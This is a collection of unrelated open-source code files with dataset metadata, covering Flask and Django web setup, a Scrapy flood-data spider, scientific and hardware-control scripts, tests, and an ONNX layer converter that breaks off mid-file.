+{"seq_id":"552547278","text":"import os, logging, sys\nfrom flask import Flask\nfrom flask.ext.sqlalchemy import SQLAlchemy\nfrom flask.ext.login import LoginManager\nfrom flask_debugtoolbar import DebugToolbarExtension\n\n# set up logging\n# see http://wiki.pylonshq.com/display/pylonscookbook/Alternative+logging+configuration\nlogging.basicConfig(\n    stream=sys.stdout,\n    level=logging.DEBUG,\n    format='[%(process)d] %(levelname)8s %(threadName)30s %(name)s - %(message)s'\n)\nlogger = logging.getLogger(\"tiwebapp\")\n\n\n# set up application\napp = Flask(__name__)\n\n# allow slashes at the end of URLs even when they're not part of views:\n# http://flask.pocoo.org/mailinglist/archive/2011/2/27/re-automatic-removal-of-trailing-slashes/#043b1a0b6e841ab8e7d38bd7374cbb58\napp.url_map.strict_slashes = False\n\napp.config[\"SQLALCHEMY_DATABASE_URI\"] = os.getenv(\"DATABASE_URL\")\ndb = SQLAlchemy(app)\n\nlogin_manager = LoginManager()\nlogin_manager.setup_app(app)\n\n\n# set up configs\n\n# Set env PACK_ASSETS=True to pack/minimize assets.\n# Set env PACK_ASSETS=False (default) to keep them in separate files.\n# Production should be PACK_ASSETS=True\napp.config[\"ASSETS_DEBUG\"] = (os.getenv(\"PACK_ASSETS\") != \"True\")\n\napp.config[\"SECRET_KEY\"] = os.getenv(\"SECRET_KEY\")\n\n# set up Flask-DebugToolbar\nif (os.getenv(\"FLASK_DEBUG\", False) == \"True\"):\n    logger.info(\"Setting app.debug=True; Flask-DebugToolbar will display\")\n    app.debug = True\n    app.config[\"DEBUG_TB_INTERCEPT_REDIRECTS\"] = False \ntoolbar = DebugToolbarExtension(app)\n\n# set up views\nfrom totalimpactwebapp import views\n","sub_path":"totalimpactwebapp/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"566491245","text":"# Curso em Vídeo Python 3 - Exercise 37\n# Conversion of an integer to binary, hexadecimal, or octal\n\nnum = int(input('Enter the number: '))\nbase = int(input('''Choose the base for the conversion:\n( 1 ) Binary\n( 2 ) Octal\n( 3 ) Hexadecimal\\n'''))\n\nif base == 1:\n    print('The number {} in binary is: {}'.format(num, bin(num)[2:]))\nelif base == 2:\n    print('The number {} in octal is: {}'.format(num, oct(num)[2:]))\nelif base == 3:\n    print('The number {} in hexadecimal is: {}'.format(num, hex(num)[2:]))\n","sub_path":"Mundo 2/Exercicios/ex037.py","file_name":"ex037.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"294922652","text":"import scrapy\nfrom scrapy.crawler import CrawlerProcess\nimport pandas as pd\nfrom unidecode import unidecode\nimport datetime\n\n\nclass CGESpider(scrapy.Spider):\n    \n    name = \"cge_spider\"\n    \n    def start_requests(self):\n        self.index = 0\n\n        # Get the current day and work backwards; set the number of days to be retrieved\n        today = datetime.datetime.today()\n        years = 20\n        numDays = 365*years\n\n        for dayIncrement in range(0, numDays):\n            date = today - datetime.timedelta(days=dayIncrement)\n            url = 'https://www.cgesp.org/v3/alagamentos.jsp?dataBusca={}%2F{}%2F{}&enviaBusca=Buscar'.format(date.day,\n                                                                                                             date.month,\n                                                                                                             date.year)\n            yield scrapy.Request(url=url, callback=self.parse)\n    \n    def parse(self, response):\n        \"\"\"\n        Extracts the date, time, region(neighborhood), location, direction, reference, and status (transitavel/intransitavel) from a given url (cgesp.org)\n        :param response: scrapy object\n        :return:\n        \"\"\"\n
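        # Extraction pattern used below (the selectors are the real ones; the\n        # sample markup is hypothetical): response.xpath(...) returns a\n        # SelectorList, so .extract_first() yields the first match or None, e.g.\n        #   response.xpath('//input[@id=\"campoBusca\"]/@value').extract_first()\n        #   # -> '01/01/2020' for <input id=\"campoBusca\" value=\"01/01/2020\">\n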
        date = response.xpath('//input[@id=\"campoBusca\"]/@value').extract_first()\n        regions_list = response.xpath('//table[@class=\"tb-pontos-de-alagamentos\"]')\n        for region in regions_list:\n            region_name = self.get_name(region)\n            flood_points_list = self.get_flood_pts_list(region)\n            for flood_point in flood_points_list:\n                time, location = self.get_time_and_loc(flood_point)\n                direction, reference = self.get_dir_and_ref(flood_point)\n                state = self.get_state(flood_point)\n                # Use unicode so special characters won't cause problems in the future\n                df_to_export.loc[df_to_export.shape[0] + 1] = [unidecode(date), unidecode(region_name), unidecode(time),\n                                                               unidecode(location), unidecode(direction),\n                                                               unidecode(reference), unidecode(state)]\n\n    def get_name(self, region):\n        \"\"\"\n        Get the name of the region/neighborhood of flooding\n        :param region: scrapy response object (that contains the region/neighborhood)\n        :return: name of the region\n        \"\"\"\n        return region.xpath('.//td[@class=\"bairro arial-bairros-alag linha-pontilhada\"]/text()').extract_first().strip()\n\n    def get_flood_pts_list(self, region):\n        \"\"\"\n        Get the flooding points within a certain region\n        :param region: scrapy response object (that contains the region/neighborhood)\n        :return: list - selector list of flood-point nodes in the region\n        \"\"\"\n        return region.xpath('.//div[@class=\"ponto-de-alagamento\"]')\n\n    def get_time_and_loc(self, flood_point):\n        \"\"\"\n        Get the time and location (respectively) in which there were floods\n        :param flood_point: scrapy response object (that contains the specific point of flooding)\n        :return: str - time range for flooding and location, respectively\n        \"\"\"\n        time_location_list = flood_point.xpath('.//li[@class=\"arial-descr-alag col-local\"]/text()').extract()\n        return time_location_list[0], time_location_list[1]\n\n    def get_dir_and_ref(self, flood_point):\n        \"\"\"\n        Get the direction and reference (respectively) of floods\n        :param flood_point: scrapy response object (that contains the specific point of flooding)\n        :return: str - direction and reference (respectively) of flood points\n        \"\"\"\n        direction_reference_list = flood_point.xpath('.//li[@class=\"arial-descr-alag\"]/text()').extract()\n        return direction_reference_list[0], direction_reference_list[1]\n\n    def get_state(self, flood_point):\n        \"\"\"\n        Get the state of a flood point (transitavel/intransitavel)\n        :param flood_point: scrapy response object (that contains the specific point of flooding)\n        :return: str - state (transitavel/intransitavel)\n        \"\"\"\n        if flood_point.xpath('.//li[@class=\"inativo-transitavel\"]').extract():\n            return flood_point.xpath('.//li[@class=\"inativo-transitavel\"]/@title').extract_first()\n        elif flood_point.xpath('.//li[@class=\"inativo-intransitavel\"]').extract():\n            return flood_point.xpath('.//li[@class=\"inativo-intransitavel\"]/@title').extract_first()\n        else:\n            # Sanity check\n            return \"No information. 
Check.\"\n\n\n# Script ran on root directory\nfilename = './Data/CGE/Datafloods.csv'\ndf_to_export = pd.DataFrame(columns=['Date', 'Region', 'Time', 'Location', 'Direction', 'Reference', 'State'])\nprocess = CrawlerProcess()\nprocess.crawl(CGESpider)\nprocess.start()\n\ndf_to_export.to_csv(filename, index=False)\n","sub_path":"Scripts/01_Data_Aquisition/CGE_spider.py","file_name":"CGE_spider.py","file_ext":"py","file_size_in_byte":4883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"59052388","text":"from .base import *\n\n\nINSTALLED_APPS += [\"rest_framework_swagger\"]\n\nif os.getenv(\"DEBUG_TOOLBAR\", \"false\").lower() in (\"true\", \"1\", \"on\"):\n    INSTALLED_APPS += [\"debug_toolbar\"]\n\n    MIDDLEWARE = [\"debug_toolbar.middleware.DebugToolbarMiddleware\", *MIDDLEWARE]\n\n    INTERNAL_IPS = [\"127.0.0.1\"]\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nCELERY_TASK_ALWAYS_EAGER = True\n\nSITE_URL = os.getenv(\"SITE_URL\", \"http://127.0.0.1:8000\")\nDEALS_CITIES = [\"DFW\", \"NYC\", \"LAX\"]\n\nDEALS_INTERNATIONAL = [\"PEK\", \"LHR\", \"HND\"]\n\nCORS_ORIGIN_ALLOW_ALL = True\nREPORT_RECEIVERS = [os.getenv(\"REPORT_RECEIVER\", \"user@example.com\")]\n","sub_path":"wanderift/settings/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"297675136","text":"# Step signal\nimport numpy as np\nimport matplotlib.pyplot as plt\n# Define the step signal via np.where(condition, [x, y])\ndef unit(t):\n    r=np.where(t>0.0,1.0,0.0)\n    return r\nt=np.linspace(-1.0,5.0,1000)\nplt.ylim(-1.0,3.0)\nplt.plot(t,unit(t))\nplt.title('aaa')\nplt.show()","sub_path":"信系(阶跃信号).py","file_name":"信系(阶跃信号).py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"92721126","text":"import pytest\nimport config\nfrom engine import Engine\n\n\n@pytest.fixture(scope='session')\ndef eng():\n    eng = Engine()\n    yield eng\n    eng.close()\n\nbackends = {}\nif \"gdb\" in config.config:\n    backends['gdb'] = {\n        'name': 'gdb',\n        'launch': ' dd\\n',\n        'tbreak_main': 'tbreak main\\n',\n        'break_main': 'break main\\n',\n        'break_bar': 'break Bar\\n',\n        'launchF': ':GdbStart gdb -q {}\\n',\n    }\nif \"lldb\" in config.config:\n    backends['lldb'] = {\n        'name': 'lldb',\n        'launch': ' dl\\n',\n        'tbreak_main': 'breakpoint set -o true -n main\\n',\n        'break_main': 'breakpoint set -n main\\n',\n        'break_bar': 'breakpoint set --fullname Bar\\n',\n        'launchF': ':GdbStartLLDB lldb {}\\n',\n    }\n\n@pytest.fixture(scope=\"function\")\ndef post(eng):\n    while eng.eval(\"tabpagenr('$')\") > 1:\n        eng.exe('tabclose $')\n    yield\n    eng.exe(\"GdbDebugStop\")\n    assert 1 == eng.eval(\"tabpagenr('$')\")\n    assert {} == eng.getSigns()\n\n@pytest.fixture(scope=\"function\", params=backends.values())\ndef backend(post, request):\n    yield request.param\n\n@pytest.fixture(scope=\"function\")\ndef two_backends(post):\n    it = iter(backends.values())\n    b1 = next(it)\n    b2 = next(it, b1)\n    yield b1, b2\n","sub_path":"test/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"530991394","text":"# -*- coding:UTF-8 -*-\r\n\r\n'''\r\nCount, via dynamic programming, the number of ways n dice (faces dmin..dmax)\r\ncan sum to a given value, and print the corresponding probability.\r\n'''\r\n\r\n\r\nclass Solution(object):\r\n    def dp_probability(self, n, sum, dmax=6, dmin=1):\r\n
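        # Recurrence (for reference): ways[i][j] = sum over k in [dmin, dmax] of ways[i-1][j-k].\r\n        # Small worked check: with two 6-sided dice and a target sum of 3, only\r\n        # (1,2) and (2,1) qualify, so the count is 2 and the probability is 2/36.\r\n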
        if sum < n * dmin or sum > n * dmax:\r\n            return 0\r\n        dp1 = [0] * (n * dmax + 1)\r\n        # init dp[1, :]\r\n        for i in range(1, dmax + 1):\r\n            dp1[i] = 1\r\n        # i: the number of dice\r\n        for i in range(2, n + 1):\r\n            dp2 = [0] * (n * dmax + 1)\r\n            # j: attainable sums with i dice\r\n            for j in range(dmin * i, dmax * i + 1):\r\n                # k: face value of the newly added die\r\n                for k in range(dmin, dmax + 1):\r\n                    if j > k:\r\n                        dp2[j] += dp1[j - k]\r\n            print(dp2)\r\n            dp1 = dp2\r\n        print(\"total = {0}, prob = {1}%\".format(dp2[sum], dp2[sum] * 100 / dmax ** n))\r\n        return dp2[sum]\r\n\r\n    def dicePro(self, target, num):\r\n        tmpArr1 = [0 for x in range(6 * num + 1)]\r\n\r\n        for x in range(1, 7):\r\n            tmpArr1[x] = 1\r\n        flag = 0\r\n        for i in range(2, num + 1):\r\n            tmpArr2 = [0 for x in range(6 * num + 1)]\r\n            for j in range(i, i * 6 + 1):\r\n                for k in range(1, 7):\r\n                    if j > k:\r\n                        tmpArr2[j] += tmpArr1[j - k]\r\n            flag = 1\r\n            # else:\r\n            #     for j in range(i, i * 6 + 1):\r\n            #         for k in range(1, 7):\r\n            #             if j > k:\r\n            #                 tmpArr1[j] += tmpArr2[j - k]\r\n            #     flag = 0\r\n            tmpArr1 = tmpArr2\r\n\r\n        print(tmpArr1)\r\n        print(tmpArr2)\r\n        print(\"total = {0}, prob = {1}%\".format(tmpArr2[target], tmpArr2[target] * 100 / 6 ** num))\r\n\r\n        return tmpArr1[target]\r\n        # > tmpArr1[target - 1] ? tmpArr2[target - 1]: tmpArr1[target - 1]\r\n\r\n\r\nif __name__ == '__main__':\r\n    nums = [1, 2, 4, 7, 11, 15]\r\n    # nums = []\r\n    target = \"I am a student.\"\r\n    tar = \"abcdefg\"\r\n    print(Solution().dicePro(18, 3))\r\n    # print(Solution().dp_probability(3, 18))\r\n","sub_path":"CodeOffer/DicePro.py","file_name":"DicePro.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"507033675","text":"# 11-3 Employee:\n# Write a class named Employee whose __init__() takes a first name, a last name, and an annual salary, and stores them all in attributes.\n# Write a method named give_raise() that increases the annual salary by $5000 by default but can also accept a different raise amount.\n# Write a test case for Employee containing two test methods: test_give_default_raise() and test_give_custom_raise().\n# Use setUp() so that you don't create a new employee instance in every test method. Run the test case and confirm that both tests pass.\nimport unittest\nfrom employee import Employee\n\n\nclass TestEmployee(unittest.TestCase):\n    \"\"\"TestEmployee\"\"\"\n\n    def setUp(self):\n        self.first = '谭'\n        self.last = '旭'\n        self.salary = 0\n\n    def test_give_default_raise(self):\n        \"\"\"Verify that the default raise yields a salary of 5000\"\"\"\n        eployee_1 = Employee(self.first, self.last, self.salary)\n        eployee_1.give_raise()\n        salary = eployee_1.show_user_info()\n        self.assertEqual(int(salary), 5000)\n\n    def test_give_custom_raise(self):\n        \"\"\"Verify the result is still correct when starting from a salary of 1000\"\"\"\n        eployee_1 = Employee(self.first, self.last, 1000)\n        eployee_1.give_raise()\n        salary = eployee_1.show_user_info()\n        self.assertEqual(int(salary), 6000)\n\n\nunittest.main()\n","sub_path":"Python编程:从入门到实践/第_11_章_测试代码/test_employee.py","file_name":"test_employee.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"583683603","text":"\nfrom werkzeug.wrappers import Request, Response, ResponseStream\nfrom flask import abort, request, make_response, jsonify\nimport json\n\nfrom utils.jwt_util import JWTEncodeDecode\n\nclass RequestUser:\n    def __init__(self, app):\n        self.app = app\n\n    def __call__(self, environ, start_response):\n        request = Request(environ)\n        jwt_encode_decode = JWTEncodeDecode()\n        # if 'Authorization' not in request.headers:\n        #     # return make_response(jsonify({\"message\": \" Token missing\"})), 403\n        #     res = Response(json.dumps('Authorization failed'), mimetype='application/json', status=401)\n        #     return res(environ, 
start_response)\n if 'Authorization' in request.headers:\n payload = None\n environ['user'] = None\n data = request.headers['Authorization']\n token = data.replace('Token ','')\n jwt_data = jwt_encode_decode.decode(token=token)\n if jwt_data['success']:\n payload = jwt_data['data']\n environ['user'] = payload\n return self.app(environ, start_response)\n","sub_path":"middlewarers/login_middleware.py","file_name":"login_middleware.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"244644310","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 23 18:02:49 2019\r\n\r\n@author: maxhu\r\n\"\"\"\r\n\r\n#====================IMPORTS, INITIALIZING, AND HOUSE CLEANING ==============#\r\nimport uControllersFunctions as F\r\nimport RPi.GPIO as GPIO\r\nimport time\r\nimport numpy as np\r\n\r\ndef initial():\r\n import uControllersFunctions as F\r\n import RPi.GPIO as GPIO\r\n import time\r\n import numpy as np\r\n \r\n CONREL = 18\r\n C = 0\r\n CS = 32\r\n CLK = 12\r\n DOUT = 40\r\n DIN = 38\r\n FAN = 22\r\n#============================================================================#\r\n ref = 3.304\r\n#============================================================================#\r\n GPIO.setmode(GPIO.BOARD)\r\n GPIO.setup(CS, GPIO.OUT)\r\n GPIO.setup(CLK, GPIO.OUT)\r\n GPIO.setup(DOUT, GPIO.IN)\r\n GPIO.setup(DIN, GPIO.OUT)\r\n GPIO.setup(CONREL,GPIO.OUT)\r\n GPIO.setup(FAN,GPIO.OUT)\r\n#============================================================================#\r\n freq = 1\r\n T_set = 30\r\n del_t = 0\r\n \r\n prop_w_cool = []\r\n time_w_cool = []\r\n del_t_w_cool = 0\r\n \r\n prop_wo_cool = []\r\n time_wo_cool = []\r\n del_t_wo_cool = 0\r\n \r\n bang_bang = []\r\n time_bang = []\r\n del_t_bang = 0\r\n#============================================================================#\r\n my_pwm_relay = GPIO.PWM(CONREL, freq)\r\n my_pwm_fan = GPIO.PWM(FAN, freq)\r\n duty = 0\r\n duty_fan = 0\r\n my_pwm_relay.start(duty)\r\n my_pwm_fan.start(duty_fan)\r\n#============================================================================#\r\n def duty_change(error):\r\n # too cold\r\n if error > 2:\r\n duty = 100\r\n my_pwm_relay.ChangeDutyCycle(duty)\r\n elif 0 < error < 2:\r\n duty = 50 * error\r\n my_pwm_relay.ChangeDutyCycle(duty)\r\n \r\n # too hot\r\n elif error < 0 and error > -2:\r\n duty_fan = np.abs(50 * error)\r\n my_pwm_fan.ChangeDutyCycle(duty_fan)\r\n elif error < -2:\r\n duty_fan = 100\r\n my_pwm_fan.ChangeDutyCycle(duty_fan)\r\n#============================================================================#","sub_path":"uControllers/Temperature Control/All in one/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":2154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"25471954","text":"#!bin/python\nimport sys, os, os.path, time, datetime, urllib.request, urllib.parse, urllib.error, glob, json, traceback\nfrom operator import itemgetter\nfrom collections import defaultdict, Counter\nimport configparser\nfrom io import StringIO\n\nimport requests\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning, InsecurePlatformWarning, SNIMissingWarning\n\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\nrequests.packages.urllib3.disable_warnings(InsecurePlatformWarning)\nrequests.packages.urllib3.disable_warnings(SNIMissingWarning)\n\nfrom optparse import OptionParser\nparser = 
OptionParser()\nparser.add_option(\"--galaxy\",dest=\"url\",help=\"Galaxy server URL\",default=None)\nparser.add_option(\"--apikey\",dest=\"apikey\",help=\"Galaxy API key\",default=None)\nparser.add_option(\"--cluster\",dest=\"cluster\",help=\"Galaxy cluster name\",default=None)\nparser.add_option(\"--directory\",dest=\"directory\",help=\"Workflows directory\",default=\"workflows\")\nopts,args = parser.parse_args()\n\nif not opts.url:\n\n assert os.path.exists('.galaxy.ini')\n config = configparser.SafeConfigParser()\n config.read(['.galaxy.ini'])\n\n if not opts.cluster or not config.has_section(opts.cluster):\n if opts.cluster and not config.has_section(opts.cluster):\n print(\"Cluster \\\"%s\\\" not found.\\n\"%(opts.cluster,), file=sys.stderr)\n print(\"Available clusters:\", file=sys.stderr)\n for sec in config.sections():\n if sec == 'GENERAL':\n continue\n print(\" \",sec, file=sys.stderr)\n sys.exit(1)\n\n url = config.get(opts.cluster,'URL') + '/galaxy/'\n apikey = config.get(opts.cluster,'APIKey')\n\nelse:\n\n assert(opts.apikey)\n\n url = opts.url\n apikey = opts.apikey\n\nfrom bioblend.galaxy import GalaxyInstance\nfrom bioblend.galaxy.dataset_collections import CollectionDescription, HistoryDatasetElement\nimport bioblend\ngi = GalaxyInstance(url=url,key=apikey)\ngi.verify=False\n\nwfname2id = defaultdict(set)\nfor wf in gi.workflows.get_workflows():\n wfname = wf['name']\n if ' (imported from ' in wfname:\n wfname = wfname.split(' (imported from ',1)[0]\n wfname2id[wfname].add(wf['id'])\n else:\n wfname2id[wfname].add(wf['id'])\n\nfor wffile in sorted(glob.glob(os.path.join(opts.directory,'*.ga'))):\n wf = json.loads(open(wffile).read())\n wfname = wf['name']\n if ' (imported from ' in wfname:\n wfname = wfname.split(' (imported from ',1)[0]\n if wfname in wfname2id:\n for wfid in wfname2id[wfname]:\n try:\n gi.workflows.delete_workflow(wfid)\n print(\"Delete workflow: %s\"%(wfname,))\n except:\n print(\"Delete workflow failed: %s\"%(wf['name'],))\n traceback.print_exc()\n try:\n wfi = gi.workflows.import_workflow_from_local_path(wffile)\n print(\"Imported workflow: %s\"%(wfi['name'],))\n except:\n print(\"Import workflow failed: %s\"%(wffile,))\n traceback.print_exc()\n","sub_path":"wfupload.py","file_name":"wfupload.py","file_ext":"py","file_size_in_byte":3002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"303044338","text":"from typing import Any\n\nimport proto\n\nclass TargetingDimensionEnum(proto.Message):\n class TargetingDimension(proto.Enum):\n UNSPECIFIED = 0\n UNKNOWN = 1\n KEYWORD = 2\n AUDIENCE = 3\n TOPIC = 4\n GENDER = 5\n AGE_RANGE = 6\n PLACEMENT = 7\n PARENTAL_STATUS = 8\n INCOME_RANGE = 9\n def __init__(\n self,\n mapping: Any | None = ...,\n *,\n ignore_unknown_fields: bool = ...,\n ) -> None: ...\n","sub_path":"google-stubs/ads/googleads/v14/enums/types/targeting_dimension.pyi","file_name":"targeting_dimension.pyi","file_ext":"pyi","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"500223704","text":"import pyglet\n\nclass Box:\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.lines = []#Lines this box is connected to\n self.update(x, y)\n\n def update(self, x, y):\n self.x = x\n self.y = y\n bottom = self.y-16\n left = self.x-16\n top = self.y+16\n right = self.x+16\n mtop = self.y+8\n mbottom = self.y-8\n mright = self.x+8\n oright = right+4\n self.batch = pyglet.graphics.Batch()\n self.g0 = 
pyglet.graphics.OrderedGroup(0)\n self.g1 = pyglet.graphics.OrderedGroup(1)\n self.square = self.batch.add_indexed(4, pyglet.gl.GL_TRIANGLES, self.g0, [0, 1, 2, 2, 0, 3],\n ('v2i', (left, bottom, right, bottom, right, top, left, top)),\n ('c3f', (1.0,)*12)\n )\n if self.app == True:\n self.s = self.batch.add_indexed(3, pyglet.gl.GL_TRIANGLES, self.g1, [0, 1, 2],\n ('v2i', (x, mbottom, mright, y, x, mtop)),\n ('c3f', (0.0,)*9)\n )\n else:\n self.s = self.batch.add_indexed(4, pyglet.gl.GL_TRIANGLES, self.g1, [0, 1, 2, 2, 0, 3],\n ('v2i', (right, mbottom, oright, mbottom, oright, mtop, right, mtop)),\n ('c3f', (1.0,)*12)\n )\n self.topattach = (x, top)\n self.leftattach = (left, y)\n self.rightattach = (right, y)\n self.bottomattach = (x, bottom)\n\n def hover(self, state=False):\n if state == True:\n self.square.colors = (1.0, 0.0, 0.0)*4\n else:\n self.square.colors = (1.0,)*12\n\nclass AbstractorBox(Box):\n\n def __init__(self, x, y):\n self.app = False\n Box.__init__(self, x, y)\n self.aline = None\n\n def update(self, x, y):\n Box.update(self, x, y)\n\n def hover(self, state=False):\n Box.hover(self, state)\n self.aline.hover(state)\n\n def draw(self):\n self.batch.draw()\n if self.aline:\n self.aline.draw()\n\n\nclass ApplicatorBox(Box):\n\n def __init__(self, x, y):\n self.app = True\n Box.__init__(self, x, y)\n self.inline = None\n self.outline = None\n\n def update(self, x, y):\n Box.update(self, x, y)\n\n def hover(self, state=False):\n Box.hover(self, state)\n self.inline.hover(state)\n self.outline.hover(state)\n\n def draw(self):\n self.batch.draw()\n if self.inline:\n self.inline.draw()\n if self.outline:\n self.outline.draw()\n\nclass Line:\n\n def __init__(self, start, end, endbox):\n self.sx, self.sy = start\n self.ex, self.ey = end\n self.endbox = endbox\n\n def draw(self):\n self.endbox.draw()\n pyglet.graphics.draw(2, pyglet.gl.GL_LINES,\n ('v2i', (self.sx, self.sy, self.ex, self.ey)),\n ('c3f', (1.0,)*6)\n )\n\n def hover(self, state=False):\n self.endbox.hover(state)\n\nwindow = pyglet.window.Window()\nb1 = AbstractorBox(50, 50)\nb2 = AbstractorBox(100, 150)\na1 = ApplicatorBox(200, 200)\nl1 = Line(b1.rightattach, b2.leftattach, b2)\nl2 = Line(b2.rightattach, a1.bottomattach, a1)\nl3 = Line(b1.topattach, a1.leftattach, a1)\nl4 = Line(b2.topattach, a1.rightattach, a1)\nb1.aline = l1\nb2.aline = l2\n\n@window.event\ndef on_draw():\n window.clear()\n b1.draw()\n l3.draw()\n l4.draw()\n\n#@window.event\n#def on_mouse_motion(x, y, dx, dy):\n# b1.update(x, y)\n\npyglet.app.run()\n","sub_path":"lambdabox.py","file_name":"lambdabox.py","file_ext":"py","file_size_in_byte":3515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"408462499","text":"# Author: Sam Youles\n# Modified by Julian Bautista\n# Moves only selected forests. 
Uses a Gaussian realisation of kappa c_ells.\n\nimport numpy as np\nimport healpy as hp\nimport sys\nimport glob\nimport os\nimport fitsio\nfrom kappa_lya import *\n\n#-- input directory name containing delta files\nindir = sys.argv[1]\noutdir = sys.argv[2]\n\n\n#-- Create angular power spectrum of kappa\ntheory = Theory()\nell, cell = theory.get_cl_kappa(2.1, kmax=100., nz=100, lmax=10000)\n\nnside=1024\nnpix=nside**2*12\nseed=1\nnp.random.seed(seed)\nkappa = create_gaussian_kappa(ell, cell, nside=nside, seed=seed)\nhp.fitsfunc.write_map('kappa_input.fits', kappa.A, fits_IDL=False)\n\n\n#-- Amend DEC and RA in each of the delta files by the bend angle from alpha map\nalldeltas = glob.glob(indir+'/*.fits.gz')\nsomedeltas = []\nfor i in alldeltas:\n if (i[-9:-8] == '0') or (int(i[-9:-8]) > 5):\n somedeltas.append(i)\nndel = len(somedeltas)\ni=0\nfor filename in somedeltas:\n #hdus = fits.open(filename)\n hdus = fitsio.FITS(filename)\n print(i, ndel)\n i+=1\n\n out = fitsio.FITS(outdir+\"/\"+os.path.basename(filename),'rw',clobber=True)\n\n for hdu in hdus[1:]:\n header = hdu.read_header()\n ra = header['RA']\n dec = header['DEC']\n\n # Add bend angles to ra and dec\n theta_lens, phi_lens = kappa.displace_objects(np.pi/2-dec, ra) \n \n # Rewrite new delta file with new values\n header['RA'] = phi_lens\n header['DEC'] = np.pi/2-theta_lens\n header['RA0'] = ra\n header['DEC0'] = dec\n \n #-- Re-create columns (maybe there's a better way to do this?) \n ll = hdu['LOGLAM'][:]\n de = hdu['DELTA'][:]\n we = hdu['WEIGHT'][:]\n co = hdu['CONT'][:] \n cols=[ll, de, we, co]\n names=['LOGLAM','DELTA','WEIGHT','CONT']\n out.write(cols, names=names, header=header, \\\n extname=str(header['THING_ID']))\n\n out.close()\n\n","sub_path":"bin/move_some_forests.py","file_name":"move_some_forests.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"75776616","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/4/8 18:39\n# @Author : Zhang\n# @FileName: do_sum.py\n# @Software: PyCharm\n# @Blog :https://codedraw.cn\nfrom flask import Flask\napp = Flask(__name__)\n\n\n@app.route('/sum//')\ndef sum(a, b):\n sum = a + b\n return \"a + b = %d\" % sum\n\n\nif __name__ == '__main__':\n app.run(debug=True, port=80)\n\n\n\n\n\n","sub_path":"PythonProject/week2/flask/do_sum.py","file_name":"do_sum.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"418626920","text":"#-------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. 
See License.txt in the project root for\n# license information.\n#--------------------------------------------------------------------------\n\nfrom ...common import NodeBuilder\nfrom ...common import utils\nfrom ...common import registration\n\n\nclass DotProductLayerConverter:\n\n @staticmethod\n def validate(cm_node):\n try:\n utils._check_has_attr(cm_node, 'dot')\n utils._check_has_attr(cm_node, 'input')\n utils._check_has_attr(cm_node, 'output')\n except AttributeError as e:\n raise RuntimeError('Missing attribute in neural network layer: {0}'.format(cm_node.name))\n\n @staticmethod\n def convert(context, cm_node, inputs, outputs):\n if cm_node.dot.cosineSimilarity:\n # To calculate cosine similarity, we first use LpNormalization to make the two input vectors unit-length.\n # Then, we calculate element-wise product of the two unit-length vectors. Finally, the similarity is the\n # sum of all the product's elements. Notice that we carefully specify the axis of the subsequent operators,\n # so they can work properly with a batch of vectors.\n\n # Normalize the first input and store the result on a temporal variable\n nb1 = NodeBuilder(context, 'LpNormalization')\n nb1.extend_input(inputs[0])\n nb1.add_attribute('p', 2)\n nb1.add_attribute('axis', 1)\n nb1.add_output(nb1.name)\n\n # Normalize the second input and store the result on a temporal variable\n nb2 = NodeBuilder(context, 'LpNormalization')\n nb2.extend_inputs(inputs[1])\n nb2.add_attribute('p', 2)\n nb2.add_attribute('axis', 1)\n nb2.add_output(nb2.name)\n\n # Do element-wise product of the two unit-length tensors\n nb3 = NodeBuilder(context, 'Mul')\n nb3.extend_inputs(nb1.output_names)\n nb3.extend_inputs(nb2.output_names)\n nb3.add_output(nb3.name)\n\n # Sum up results from different dimensions to get the final cosine similarity\n nb4 = NodeBuilder(context, 'ReduceSum')\n nb4.extend_inputs(nb3.output_names)\n nb4.extend_outputs(outputs)\n nb4.add_attribute('axes', [1])\n nb4.add_attribute('keepdims', False)\n\n return [nb.make_node() for nb in [nb1, nb2, nb3, nb4]]\n else:\n # This case is a simple dot product, which can be formed by a element-wise multiplication followed by\n # a reduction.\n\n # Calculate the element-wise product of inputs\n nb1 = NodeBuilder(context, 'Mul')\n nb1.extend_inputs(inputs)\n nb1.add_output(nb1.name)\n\n # Aggregate the product across all coordinates\n nb2 = NodeBuilder(context, 'ReduceSum')\n 